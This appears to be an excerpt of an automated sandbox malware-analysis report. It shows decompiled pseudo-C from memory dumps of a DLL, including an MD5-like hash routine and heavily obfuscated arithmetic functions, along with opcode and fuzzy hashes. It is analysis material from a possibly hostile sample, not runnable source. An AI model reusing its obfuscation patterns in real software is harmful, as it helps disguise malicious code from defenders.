                                				asm("inc ecx");
                                				r9d = r9d + r8d;
                                				r10d = __rcx + __r10 - 0x3e423112;
                                				asm("inc ecx");
                                				r10d = r10d + r9d;
                                				r11d = __rcx + _t611 - 0xa83f051;
                                				asm("inc ecx");
                                				r11d = r11d + r10d;
                                				asm("rol edx, 0xc");
                                				r8d = __rcx + _t619 - 0x57cfb9ed;
                                				asm("inc ecx");
                                				r8d = r8d + __rcx +  &(_t617[0x11e1f18a]) + r11d;
                                				r9d = __rcx + __r10 - 0x2b96aff;
                                				asm("inc ecx");
                                				r13d = _v80;
                                				r14d = _v68;
                                				r9d = r9d + r8d;
                                				r10d = __rcx + __r11 + 0x698098d8;
                                				asm("inc ecx");
                                				r10d = r10d + r9d;
                                				asm("rol edx, 0xc");
                                				asm("ror edi, 0xf");
                                				r9d = __rcx + _t619 - 0x76a32842;
                                				asm("inc ecx");
                                				r9d = r9d + __rcx + _t617 - 0xa44f + __rcx + _t611 - 0x74bb0851 + r10d;
                                				r11d = __rcx + __r10 + 0x6b901122;
                                				asm("inc ecx");
                                				r11d = r11d + r9d;
                                				asm("rol ebx, 0xc");
                                				_t388 = __rcx + _t611 - 0x2678e6d + r11d;
                                				r8d = _t388;
                                				r8d =  !r8d;
                                				r10d = __rcx + _t612 - 0x5986bc72;
                                				asm("inc ecx");
                                				r10d = r10d + _t388;
                                				r8d = r8d & r10d;
                                				r9d = __rcx + _t619 + 0x49b40821;
                                				asm("inc ecx");
                                				r9d = r9d + r10d;
                                				r8d = r8d | _t388 & r9d;
                                				r8d = r8d + _v116;
                                				r11d = _t617 + __r11 - 0x9e1da9e;
                                				asm("inc ecx");
                                				r11d = r11d + r9d;
                                				r8d =  &(_t611[__rbx - 0x3fbf4cc0]);
                                				asm("inc ecx");
                                				r8d = r8d + r11d;
                                				asm("rol edx, 0xe");
                                				r10d = __rcx + _t619 - 0x16493856;
                                				asm("inc ecx");
                                				r10d = r10d + __rcx + __r10 + 0x265e5a51 + r8d;
                                				r9d = __rcx + __r11 - 0x29d0efa3;
                                				asm("inc ecx");
                                				r9d = r9d + r10d;
                                				r11d = __rcx +  &(_t617[0x910514]);
                                				asm("inc ecx");
                                				r11d = r11d + r9d;
                                				r8d = __rcx + _t611 - 0x275e197f;
                                				asm("inc ecx");
                                				r8d = r8d + r11d;
                                				asm("ror edx, 0xc");
                                				r10d = __rcx + _t619 + 0x21e1cde6;
                                				asm("inc ecx");
                                				r10d = r10d + __rcx + __r10 - 0x182c0438 + r8d;
                                				r9d = __rcx + __r11 - 0x3cc8f82a;
                                				asm("inc ecx");
                                				r9d = r9d + r10d;
                                				r11d = __rcx + _t617 - 0xb2af279;
                                				asm("inc ecx");
                                				r11d = r11d + r9d;
                                				asm("ror ebx, 0xc");
                                				asm("rol edx, 0x5");
                                				r8d = __rcx + _t619 - 0x3105c08;
                                				asm("inc ecx");
                                				r8d = r8d + __rcx + __r10 - 0x561c16fb + __rcx +  &(_t611[0x455a14ed]) + r11d;
                                				r9d = __rcx + __r11 + 0x676f02d9;
                                				asm("inc ecx");
                                				r9d = r9d + r8d;
                                				r10d = __rcx + __rbx - 0x72d5b376;
                                				asm("inc ecx");
                                				r10d = r10d + r9d;
                                				asm("rol edx, 0x4");
                                				r8d = __rax + _t617 - 0x788e097f;
                                				asm("inc ecx");
                                				r8d = r8d + __rax + _t611 - 0x5c6be + r10d;
                                				r9d = __rax + _t619 + 0x6d9d6122;
                                				asm("inc ecx");
                                				r9d = r9d + r8d;
                                				r10d = __rax + __r10 - 0x21ac7f4;
                                				asm("inc ecx");
                                				r10d = r10d + r9d;
                                				r11d = __rcx + _t611 - 0x5b4115bc;
                                				asm("inc ecx");
                                				r11d = r11d + r10d;
                                				asm("rol edx, 0xb");
                                				r8d = __rax + _t619 - 0x944b4a0;
                                				asm("inc ecx");
                                				r8d = r8d + __rax +  &(_t617[0x12f7b3ea]) + r11d;
                                				r9d = __rax + __r10 - 0x41404390;
                                				asm("inc ecx");
                                				r9d = r9d + r8d;
                                				r10d = __rcx + __r11 + 0x289b7ec6;
                                				asm("inc ecx");
                                				r10d = r10d + r9d;
                                				r11d = __rax + _t611 - 0x155ed806;
                                				asm("inc ecx");
                                				r11d = r11d + r10d;
                                				r8d = __rax + _t617 - 0x2b10cf7b;
                                				asm("inc ecx");
                                				r8d = r8d + r11d;
                                				asm("ror edx, 0x9");
                                				r9d = __rcx + __r10 - 0x262b2fc7;
                                				asm("inc ecx");
                                				r9d = r9d + __rax + _t619 + 0x4881d05 + r8d;
                                				asm("rol ecx, 0xb");
                                				r10d = __rax +  &(_t617[0x7e89f3e]);
                                				asm("inc ecx");
                                				r10d = r10d + __rax + __r11 - 0x1924661b + r9d;
                                				r8d = __rax + _t611 - 0x3b53a99b;
                                				asm("inc ecx");
                                				r8d = r8d + r10d;
                                				asm("rol edx, 0x6");
                                				r9d = __rax + __rcx + 0x432aff97;
                                				asm("inc ecx");
                                				r9d = r9d + __rax + _t619 - 0xbd6ddbc + r8d;
                                				asm("rol ecx, 0xf");
                                				r10d = __rax + _t617 - 0x36c5fc7;
                                				asm("inc ecx");
                                				r10d = r10d + __rax + __r10 - 0x546bdc59 + r9d;
                                				r8d = __rax +  &(_t611[0x655b59c3]);
                                				asm("inc ecx");
                                				r8d = r8d + r10d;
                                				asm("rol edx, 0xa");
                                				r9d = __rax + __rcx - 0x100b83;
                                				asm("inc ecx");
                                				r9d = r9d + __rax + _t619 - 0x70f3336e + r8d;
                                				asm("ror ecx, 0xb");
                                				r10d = __rax +  &(_t617[0x1bea1f93]);
                                				asm("inc ecx");
                                				r10d = r10d + __rax + __r10 - 0x7a7ba22f + r9d;
                                				r11d = __rax + _t611 - 0x1d31920;
                                				asm("inc ecx");
                                				r11d = r11d + r10d;
                                				r9d = __rax + _t619 - 0x5cfebcec;
                                				asm("inc ecx");
                                				r9d = r9d + r11d;
                                				asm("ror ebx, 0xb");
                                				r8d = __rax + __r10 - 0x8ac817e;
                                				asm("inc ecx");
                                				r8d = r8d + __rax + __rcx + 0x4e0811a1 + r9d;
                                				asm("rol edx, 0xa");
                                				_t596 = __rax + __r11 - 0x42c50dcb + r8d;
                                				_t620 = _a8;
                                				asm("rol ecx, 0xf");
                                				r8d =  !r8d;
                                				 *_t620 = _a24 + r8d;
                                				_t567 = __rax + _t619 + 0x2ad7d2bb + _t596;
                                				r8d = r8d | _t567;
                                				r8d = r8d ^ _t596;
                                				r8d = r8d + _v84;
                                				asm("ror eax, 0xb");
                                				 *((intOrPtr*)(_t620 + 4)) = _t617 + __rbx - 0x14792c6f +  *((intOrPtr*)(_t620 + 4)) + _t567;
                                				 *((intOrPtr*)(_t620 + 8)) =  *((intOrPtr*)(_t620 + 8)) + _t567;
                                				_t385 =  *((intOrPtr*)(_t620 + 0xc)) + _t596;
                                				 *((intOrPtr*)(_t620 + 0xc)) = _t385;
                                				return _t385;
                                			}































                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                                • Instruction ID: 1234320190a57ce5198f3b4af1d4f0486c8f65fd9f93060ef17f932511bc9258
                                • Opcode Fuzzy Hash: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                                • Instruction Fuzzy Hash: 5B12B4B7B784514BD71CCB19E892FA97792F394308B09912CEA17D3F44DA3DEA06CA00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E00007FFC7FFC130E5CC0(signed int __edx, short __edi, signed int __rax, long long __rcx, signed int __r8, signed int __r9, long long _a8, signed int _a16, signed int _a24, signed int _a32, intOrPtr _a40, intOrPtr _a48, signed long long _a56, signed int _a64, intOrPtr _a80, signed int _a88, signed short _a96) {
                                				long long _v80;
                                				long long _v88;
                                				signed int _v96;
                                				signed int _v104;
                                				signed int _v112;
                                				signed long long _v120;
                                				void* _v128;
                                				long long _v136;
                                				signed int _v144;
                                				signed long long _v152;
                                				signed long long _v168;
                                				signed int _v176;
                                				signed long long _v184;
                                				signed int _v192;
                                				signed int _v200;
                                				void* __rbx;
                                				void* __rdi;
                                				void* __r15;
                                				signed int _t406;
                                				short _t415;
                                				signed long long _t422;
                                				signed short _t440;
                                				long long _t446;
                                				signed int _t452;
                                				signed int _t453;
                                				short _t459;
                                				void* _t489;
                                				signed char _t514;
                                				signed short _t521;
                                				signed int _t522;
                                				signed short _t533;
                                				signed int _t543;
                                				signed int _t642;
                                				signed short _t646;
                                				signed int _t647;
                                				void* _t662;
                                				signed short _t670;
                                				long long _t671;
                                				signed long long _t673;
                                				signed long long _t675;
                                				signed long long _t680;
                                				signed long long _t682;
                                				signed long long _t683;
                                				intOrPtr _t689;
                                				long long _t691;
                                				signed long long _t696;
                                				intOrPtr _t697;
                                				intOrPtr _t698;
                                				signed int _t699;
                                				signed long long _t700;
                                				signed long long _t702;
                                				signed long long _t708;
                                				signed long long _t709;
                                				signed long long _t710;
                                				intOrPtr _t712;
                                				intOrPtr _t713;
                                				signed long long _t714;
                                				signed long long _t721;
                                				intOrPtr _t722;
                                				signed long long _t723;
                                				signed long long _t727;
                                				signed long long _t728;
                                				long long _t729;
                                				signed long long _t730;
                                				signed int* _t735;
                                				signed long long _t745;
                                				intOrPtr _t751;
                                				signed long long _t753;
                                				signed long long _t755;
                                				signed long long _t757;
                                				intOrPtr _t764;
                                				signed long long _t766;
                                				signed long long _t770;
                                				signed long long _t774;
                                				signed long long _t778;
                                				signed long long _t780;
                                				intOrPtr _t787;
                                				intOrPtr _t788;
                                				signed int _t790;
                                				signed long long _t791;
                                				signed long long _t797;
                                				signed long long _t799;
                                				signed int _t803;
                                				signed long long _t804;
                                				signed long long _t805;
                                				signed long long _t807;
                                				signed char* _t809;
                                				long long _t815;
                                				intOrPtr _t818;
                                				signed long long _t834;
                                				signed long long _t836;
                                				signed long long _t843;
                                				signed int* _t846;
                                				signed long long _t849;
                                				signed int _t851;
                                				signed long long _t853;
                                				signed long long _t854;
                                				signed long long _t858;
                                				intOrPtr _t864;
                                				signed int _t865;
                                				short* _t866;
                                				signed int _t867;
                                
                                				_a32 = __r9;
                                				_a24 = __r8;
                                				_a16 = __edx;
                                				_a8 = __rcx;
                                				r9d = _a96 & 0x000000ff;
                                				_t521 =  *0x1312414c; // 0x0
                                				r14d = r9d;
                                				_t867 =  *0x13124124;
                                				_t522 = _t521 + 1;
                                				_t853 =  *(_a88 +  *0x13124148 * 4) | __rax;
                                				_t865 = _t867;
                                				_t864 =  *0x13124150; // 0x0
                                				_t514 = __edx & 0x000000ff;
                                				_v120 = _t853;
                                				_t670 =  *0x13124158; // 0x0
                                				r8d =  *0x13124130 & 0x0000ffff;
                                				_v112 = _t670;
                                				_t671 =  *0x131241a0; // 0x0
                                				_v128 = _t671;
                                				_t803 = r8d - r9d;
                                				r8w = r8w + 0xffff;
                                				 *0x1312414c = _t522;
                                				_v88 = _t671;
                                				 *0x13124130 = r8w;
                                				r8d =  *0x13124133 & 0x000000ff;
                                				r8b = r8b + 0xff;
                                				_v136 = _t522;
                                				_t673 =  *0x131241a8; // 0x0
                                				 *0x13124133 = r8b;
                                				r9d = r8b & 0xffffffff;
                                				r8b = r8b + 0xff;
                                				_a96 = r9d;
                                				r9d = _t514;
                                				 *0x13124133 = r8b;
                                				_v144 = _t673;
                                				_t815 = _t673 * 4;
                                				_t778 = r9d % ( *(_t673 + 0x97e) & 0x000000ff);
                                				_v152 = _t778;
                                				_v96 = _t803;
                                				_v104 = _t728;
                                				_v80 = _t815;
                                				if ( *((intOrPtr*)(_t815 + _v128)) - ( *0x13124122 & 0x000000ff) < 0) goto 0x130e5ea4;
                                				_t735 = _a40 + _t728 * 4;
                                				_t37 = _t867 + 0x461; // 0x533
                                				asm("cdq");
                                				_t406 = _t37 /  *_t735;
                                				 *_t735 = _t406;
                                				_t836 =  *0x13124180; // 0x0
                                				_t675 =  *0x131241a0; // 0x0
                                				_t846 = _a8 + _t675 * 4;
                                				 *_t846 = _t406 * _t836 /  *(_t853 +  *0x13124168 * 4) %  *_t846;
                                				goto 0x130e67fd;
                                				 *0x1312414c = _t846[0x4cd] * (_t514 & 0x000000ff);
                                				_t745 = _a56;
                                				 *((short*)(_t803 + 2 + (_t836 - ((_t836 - _t778 >> 1) + _t778 >> 8) * 0x1ff) * 2)) = __edi;
                                				r8d =  *0x13124148; // 0x0
                                				_t642 = r8d;
                                				r8d = r8d + 1;
                                				 *0x13124148 = r8d;
                                				if (_t642 == ( *(_t745 + r8d * 2) & 0x0000ffff)) goto 0x130e610d;
                                				_t854 =  *0x131241a0; // 0x0
                                				r8d =  *0x13124194; // 0x0
                                				r8d = r8d + _t642;
                                				r8d = 0xa65;
                                				_t799 = _t642;
                                				r8d = r8d - ( *0x13124130 & 0x0000ffff);
                                				_v192 = r11d;
                                				 *0x131241a0 = _t854 - 1;
                                				_v200 = r8d;
                                				_t415 = E00007FFC7FFC130FB370(_t854, _t745, _t778, _t799, r8d, _t867);
                                				_t729 = _v136;
                                				_v192 = _t642;
                                				_v200 = 0;
                                				 *((short*)(_t729 + _t745 * 8)) = _t415;
                                				 *((intOrPtr*)(_v80 +  *0x13124140)) = _t642 -  *((intOrPtr*)(_v80 +  *0x13124140));
                                				_t680 =  *0x13124158; // 0x0
                                				 *((intOrPtr*)(_a40 + _t680 * 4)) = _t642 -  *((intOrPtr*)(_a40 + _t680 * 4));
                                				_t818 =  *0x13124138; // 0x0
                                				asm("cdq");
                                				_t751 =  *0x13124160; // 0x0
                                				r9d =  *(_t799 + _t751) & 0x000000ff;
                                				_t422 = E00007FFC7FFC130FB370(_t680, _a32, _t778 +  *((intOrPtr*)(_t818 + _t799 * 8)),  *((intOrPtr*)(_t818 + _v96 * 8)) - _v152, r8d & _a32, _t867);
                                				_t533 =  *(_t799 * 8);
                                				_t780 = _t422;
                                				_v152 = _t780;
                                				if (_t533 == _t642) goto 0x130e60d3;
                                				asm("o16 nop [eax+eax]");
                                				_t682 =  *0x13124124;
                                				_t646 = (_t521 & 0x0000ffff |  *0x13124120) + 1;
                                				 *(_t864 + _t682 * 2) = ( *(_t864 + _t682 * 2) & 0x0000ffff) * (_t533 & 0x0000ffff);
                                				r8d =  *(_t865 + _t682 * 8) & 0x0000ffff;
                                				r8d = r8d * (_t533 & 0x0000ffff);
                                				 *(_t729 + (_t780 + _t780 * 2) * 2) =  *(_t729 + (_t780 + _t780 * 2) * 2) | r8w;
                                				_t683 =  *0x13124170; // 0x0
                                				 *(_t866 + _t683 * 2) = _t642;
                                				 *(_a88 + _a64 * 4) = ( *_a64 & 0x000000ff) %  *(_a88 + _a64 * 4);
                                				_t689 =  *0x13124178; // 0x0
                                				asm("cdq");
                                				r15d = (( *(_t689 +  *0x13124168 * 2) & 0x0000ffff) + ( *(_a48 + 0x1e16) & 0x000000ff)) % r15d;
                                				if (_t533 + 1 != _t642) goto 0x130e6020;
                                				r8d =  *0x13124148; // 0x0
                                				_t753 = _a56;
                                				r8d = r8d + 1;
                                				 *0x13124148 = r8d;
                                				if (_t642 + 1 != ( *(_t753 + r8d * 2) & 0x0000ffff)) goto 0x130e5ef0;
                                				_t849 = _a88;
                                				_t691 = r15d;
                                				_v136 = _t691;
                                				if (_t691 - _v152 <= 0) goto 0x130e6161;
                                				 *_t866 =  *_t866 + 1;
                                				_t804 =  *0x131241a0; // 0x0
                                				_t805 = _t804 - 1;
                                				 *0x131241a0 = _t805;
                                				if ( *((intOrPtr*)(_t849 + _t753 * 4)) -  *((intOrPtr*)(_v120 + _t805 * 4)) > 0) goto 0x130e6158;
                                				if ( *((intOrPtr*)(_t849 + _v144 * 8)) != _a96) goto 0x130e6158;
                                				r8d =  *0x13124148; // 0x0
                                				goto 0x130e617e;
                                				r8d =  *0x13124148; // 0x0
                                				goto 0x130e616d;
                                				if ( *((intOrPtr*)(_v104 + 8 + _v144 * 2)) - 0xa59 <= 0) goto 0x130e62eb;
                                				r9d =  *0x13124180 & 0x0000ffff;
                                				_t755 =  *0x13124168;
                                				asm("cdq");
                                				_t696 = _v128;
                                				r10d =  *(_t696 + _t755 * 2) & 0x0000ffff;
                                				_v184 = _t849;
                                				_v192 = ( *(_t865 + _t755 * 2) & 0x0000ffff) - 0x2c0;
                                				_v200 =  *(_t849 + _t755 * 4) /  *0x13124194;
                                				_t440 = E00007FFC7FFC130E81C0(_t696, _t729, 0x1999 / (_t646 & 0x0000ffff), _t799 +  *0x13124170, _t799 +  *0x13124170, _v104);
                                				_t543 =  *0x13124148; // 0x0
                                				_a96 = _t440;
                                				_t858 = _t543 + 0xffffeab4;
                                				_t757 =  *0x131241a0; // 0x0
                                				r9d =  *(_t757 + _v88 + 4) & 0x000000ff;
                                				_v168 = _t696;
                                				r9d = r9d & 0x00001649;
                                				_v176 =  *0x13124133 & 0x000000ff;
                                				_v184 = ( *(_t866 + 0x2a0e) & 0x0000ffff) - 0x1bcd;
                                				r8d = 0x1188;
                                				_v192 = (0x157da0e3 *  *0x13124134 >> 0x20 >> 9) + (0x157da0e3 *  *0x13124134 >> 0x20 >> 9 >> 0x1f);
                                				_v200 = 0x8d3;
                                				_t446 = E00007FFC7FFC130E9620(_t646, _t729, _t858, _t799 +  *0x13124170, ( *(_t866 + 0x2a0e) & 0x0000ffff) - 0x1bcd);
                                				_t851 = _a88;
                                				_t697 =  *0x13124138; // 0x0
                                				 *((long long*)(_t697 + (0x23 + _t696 * 4) * 8)) = _t446;
                                				r8d =  *0x13124148; // 0x0
                                				_t807 =  *0x131241a0; // 0x0
                                				goto 0x130e62f8;
                                				_t787 =  *0x13124150; // 0x0
                                				r11d = _t646 & 0x0000ffff;
                                				if (_t697 != _t787) goto 0x130e647e;
                                				_t698 =  *0x13124128; // 0x0
                                				r9d = _a16 & 0x000000ff;
                                				r9b = r9b + 1;
                                				if (( *(_v128 + _v104 * 4) & 0x0000ffff) ==  *((intOrPtr*)(_t698 +  *0x13124168 * 4))) goto 0x130e648c;
                                				_t788 =  *0x13124150; // 0x0
                                				if ( *((intOrPtr*)(_a8 + _t858 * 4)) - 0x1f27 < 0) goto 0x130e648c;
                                				if ( *0x13124168 - 0x15a4 < 0) goto 0x130e648c;
                                				r8d = r8d + 1;
                                				_t699 = r8d;
                                				 *0x13124148 = r8d;
                                				r9d = 0x19ec;
                                				_t764 =  *0x131241a8; // 0x0
                                				_t730 = (r9b & 0xffffffff) - ( *(_t699 + _a48) & 0x000000ff);
                                				_t452 =  *0x1312414c; // 0x0
                                				_t453 = _t452 - 1;
                                				 *0x1312414c = _t453;
                                				r9w = r9w - _t453;
                                				 *0x1312416c = ( *0x1312416c & 0x0000ffff) + 1;
                                				r10d =  *(_t699 + _t764) & 0x000000ff;
                                				_t700 = _v152;
                                				r10d = r10d & _a96;
                                				r8d =  *(_t764 + _t700 * 4) & 0x000000ff;
                                				r8d = 0x1081;
                                				 *0x131241a0 = _t807 + 1;
                                				_t702 = ( *(_t865 + 0x2c + (_t700 + _t700 * 2) * 2) & 0x0000ffff) % r8d;
                                				_v184 = _t702;
                                				_v192 = 0x6c8;
                                				_v200 = r10d;
                                				_t459 = E00007FFC7FFC130E81C0(_t702, _t730, _t730, _v136 + _t788, _v88, _v104);
                                				_t766 =  *0x131241a0; // 0x0
                                				_t790 = _a32;
                                				 *((short*)(_t790 + 0x1c + _t766 * 2)) = _t459;
                                				 *((short*)(_t865 + _t766 * 2)) = 0x1553 -  *((intOrPtr*)(_t865 + _t766 * 2));
                                				asm("cdq");
                                				asm("cdq");
                                				 *(_t790 + _t702 * 2) = ( *0x13124130 & 0x0000ffff) %  *0x13124168 % ( *(_t790 + _t702 * 2) & 0x0000ffff);
                                				 *0x13124124 =  *0x13124124 - 1;
                                				goto 0x130e67fd;
                                				r9d = _a16 & 0x000000ff;
                                				goto 0x130e6345;
                                				r9b = r9b + 0xff;
                                				_t809 = _a64;
                                				_a88 = _t702;
                                				_a16 = r9b;
                                				 *(_a32 + _t702 * 2) =  *(_a32 + _t702 * 2) ^ 0x0000d5ef;
                                				_t791 =  *0x131241a0; // 0x0
                                				 *0x131241a0 = _t791 + 1;
                                				 *((short*)(_t864 + _t766 * 2)) = (r9b & 0xffffffff) / _t766;
                                				_t708 =  *0x13124180; // 0x0
                                				 *(_t766 * 8) = _t708;
                                				_t662 =  *0x13124190 - (_t809[0x1258] & 0x000000ff); // 0x0
                                				if (_t662 != 0) goto 0x130e6734;
                                				_t647 = _v112 & 0x0000ffff;
                                				_a96 = 0x4d1 - _t646;
                                				_t709 =  *0x131241a0; // 0x0
                                				_t710 = _t709 + _t709;
                                				asm("cdq");
                                				 *0x13124194 =  *(_t851 + _t710 * 8) / _t647;
                                				 *(_t730 << 5) = _t710 ^ _a24;
                                				_t712 =  *0x13124178; // 0x0
                                				_t713 =  *0x13124140; // 0x0
                                				_t714 =  *0x13124160; // 0x0
                                				asm("cdq");
                                				_t843 = ( *(_t714 + 0x59b) & 0x000000ff) /  *0x13124168;
                                				r10d =  *(_v96 + _t714 * 2) & 0x0000ffff;
                                				_v192 = r10d;
                                				_v200 =  *((intOrPtr*)(_t851 + 0x21d8));
                                				_t489 = E00007FFC7FFC130FB370(_t714, _v96, ( *(_t712 + _t730 * 4 - 4) & 0x0000ffff) - (0x415708ef * ( *(_t712 + _t730 * 4 - 4) & 0x0000ffff) >> 0x20 >> 8) * 0x3eb,  *(_t713 +  *0x13124124 * 4) * 0xfc9, _t843, _t867);
                                				asm("cdq");
                                				 *0x13124168 = (_a80 - 1) %  *0x13124168;
                                				_t797 =  *0x13124160; // 0x0
                                				r9d =  *_t809 & 0x000000ff;
                                				if ( *((intOrPtr*)(_t797 + _t843 * 2)) - ( *(_t714 + _t797) & 0x000000ff) >= 0) goto 0x130e66cd;
                                				if (_v112 - 0x1923 > 0) goto 0x130e66cd;
                                				_t770 =  *0x13124124;
                                				if ( *((intOrPtr*)(_v96 +  *0x13124148 * 2)) != ( *(_v104 + _t770 * 2) & 0x0000ffff)) goto 0x130e66cd;
                                				if (_t770 ==  *(_a88 * 8)) goto 0x130e66cd;
                                				 *((char*)(_v144 + _a48)) = 0x1923 / _t770;
                                				goto 0x130e67fd;
                                				r9d = _a16 & 0x000000ff;
                                				_t721 = _t647 - (0x39835051 * _t647 >> 0x20 >> 9) * 0x8e7 -  *0x131241a0;
                                				 *0x131241a0 = _t721;
                                				 *((intOrPtr*)(_t721 * 2 + _t865)) =  *((intOrPtr*)(_t721 * 2 + _t865)) + 0x1c74 - r8w;
                                				 *0x13124123 = (_a96 & 0x0000ffff) / ( *0x13124130 & 0x0000ffff);
                                				r9b = r9b + 0xff;
                                				r15w = r15w & 0x00000044;
                                				_t722 =  *0x13124188; // 0x0
                                				_t774 = _t489 + _t489;
                                				_t723 =  *0x131241a0; // 0x0
                                				 *((short*)(_a56 + _t721 * 4)) = ( *(_t866 + 0x38 + _t723 * 2) & 0x0000ffff) + ( *(_t722 + 0x38 + _t774 * 8) & 0x0000ffff) -  *((intOrPtr*)(_a56 + _t721 * 4));
                                				 *0x131241a0 =  *0x131241a0 + 1;
                                				r15w = r15w -  *(_t866 + _t723 * 2);
                                				 *(_t866 + _t723 * 2) = r15w;
                                				 *(_a8 + _t774 * 4) = (r9b & 0xffffffff) /  *0x13124180 /  *(_a8 + _t774 * 4);
                                				_t834 =  *0x13124170; // 0x0
                                				_t727 =  *0x13124134;
                                				 *(_t834 * 8) =  *(_t834 * 8) | 0x0000127b % ( *(_t866 + _t797 * 2) & 0x0000ffff) ^ _t727;
                                				 *((short*)(_a32 + _t727 * 4)) = 0x1189 -  *((intOrPtr*)(_a32 + _t727 * 4));
                                				return 0x1d67;
                                 			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: db6ca8fb41c8cf6cd69c8ef76619ea67670e755baa92d9266841555edbf901a7
                                • Instruction ID: 71642d64cf547fec34b6d633e287e3f4ec6dda4b21826decc55a12b476245e61
                                • Opcode Fuzzy Hash: db6ca8fb41c8cf6cd69c8ef76619ea67670e755baa92d9266841555edbf901a7
                                • Instruction Fuzzy Hash: 3762E972A08EA985E764CF1AF84027977B1FB98B65F214136DA8D63764DF3CE060CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 96%
                                			E00007FFC7FFC130FB370(signed int __rax, void* __rcx, void* __rdx, long long __r8, long long __r9, signed int __r15) {
                                				signed int _t222;
                                				signed short _t225;
                                				intOrPtr _t229;
                                				long long _t234;
                                				signed int _t235;
                                				signed int _t242;
                                				signed int _t250;
                                				signed int _t256;
                                				signed char _t257;
                                				signed int _t262;
                                				signed int _t281;
                                				signed int _t285;
                                				signed long long _t286;
                                				signed int _t288;
                                				signed int _t328;
                                				void* _t330;
                                				signed long long _t346;
                                				intOrPtr _t347;
                                				signed int _t348;
                                				signed long long _t350;
                                				signed long long _t353;
                                				signed long long _t355;
                                				intOrPtr _t356;
                                				intOrPtr _t357;
                                				signed long long _t359;
                                				intOrPtr _t369;
                                				signed long long _t374;
                                				signed long long _t377;
                                				signed long long _t378;
                                				intOrPtr _t379;
                                				intOrPtr _t386;
                                				intOrPtr _t387;
                                				signed long long _t388;
                                				signed long long _t394;
                                				signed int _t399;
                                				signed long long _t403;
                                				signed long long _t404;
                                				signed long long _t405;
                                				signed long long _t407;
                                				signed long long _t410;
                                				intOrPtr _t414;
                                				signed int _t418;
                                				signed long long _t419;
                                				signed long long _t423;
                                				signed int _t429;
                                				signed long long _t431;
                                				signed long long _t433;
                                				signed int _t437;
                                				signed int _t443;
                                				void* _t445;
                                				signed long long _t446;
                                				void* _t448;
                                				signed int* _t449;
                                				long long _t451;
                                				long long _t452;
                                				signed long long _t456;
                                				signed int _t461;
                                				signed long long _t464;
                                				signed long long _t465;
                                				signed int _t466;
                                				signed int* _t468;
                                				signed long long _t469;
                                				signed long long _t470;
                                				signed long long _t472;
                                				signed long long _t476;
                                				signed int _t481;
                                
                                				_t451 = __r8;
                                				 *((long long*)(_t448 + 0x20)) = __r9;
                                				 *((long long*)(_t448 + 0x18)) = __r8;
                                				_push(_t445);
                                				_push(_t476);
                                				_t449 = _t448 - 0x60;
                                				_t469 =  *0x131241a0; // 0x0
                                				_t461 =  *0x13124180; // 0x0
                                				r8d = __rcx + 1;
                                				r14d =  *0x13124158 & 0x000000ff;
                                				r13d = 0x3c2;
                                				_t456 = _t449[0x32];
                                				_t449[0x2a] =  *(__r9 + _t469 * 4) & 0x0000ffff ^ r10d;
                                				_t470 = _t469 - 1;
                                				_t449[8] = __rax;
                                				 *0x13124130 = ( *0x13124130 & 0x0000ffff) + 1;
                                				_t449[0xe] =  *0x13124134;
                                				_t449[4] = _t461;
                                				 *0x13124180 = _t461 - 1;
                                				_t449[0xa] =  *((intOrPtr*)(__r8 +  *0x13124168 * 4));
                                				 *0x131241a0 = _t470;
                                				_t437 = ( *0x13124120 & 0x0000ffff) - r8d;
                                				r8d = r8d - 1;
                                				_t449[0x10] = _t437;
                                				_t328 = ( *0x13124122 & 0x000000ff) +  *((intOrPtr*)(__r8 + (_t470 + _t470 * 2) * 4));
                                				_t346 = r8d;
                                				_t449[2] = _t346;
                                				_t347 =  *0x13124128; // 0x0
                                				_t464 = _t346 | 0x00001de4;
                                				_t449[1] = _t328;
                                				_t449[6] = _t464;
                                				_t449[0x28] =  *(_t347 + _t470 * 8) & 0x000000ff;
                                				_t222 =  *0x13124124; // 0x0
                                				 *((intOrPtr*)(__r8 + (_t222 + _t222) * 4)) =  *((intOrPtr*)(__r8 + (__r8 + 1) * 4));
                                				_t225 = __r8 - 1;
                                				 *_t449 = _t225;
                                				_t348 =  *0x131241a0; // 0x0
                                				 *0x131241a0 = _t348 + 1;
                                				_t399 = __rdx + _t456 * 8;
                                				 *((short*)(0x35d9 + _t456 * 2)) = ((_t225 ^ 0x00000a54) &  *(__rdx + 0x7d8)) -  *((intOrPtr*)(0x35d9 + _t456 * 2));
                                				_t350 =  *0x13124198; // 0x0
                                				_t449[0xc] = _t399;
                                				if ( *_t399 - _t350 <= 0) goto 0x130fb992;
                                				_t330 =  *0x1312414c - r8d; // 0x0
                                				_t449[0x16] = __r15;
                                				_t481 = _t449[0x30];
                                				if (_t330 > 0) goto 0x130fb5f6;
                                				_t229 =  *0x13124148; // 0x0
                                				if (_t449[4] !=  *((intOrPtr*)(__r8 + (_t229 + _t229) * 4))) goto 0x130fb5f6;
                                				if (_t449[0xa] - 0x18b2 > 0) goto 0x130fb5f6;
                                				r8d =  *0x13124124; // 0x0
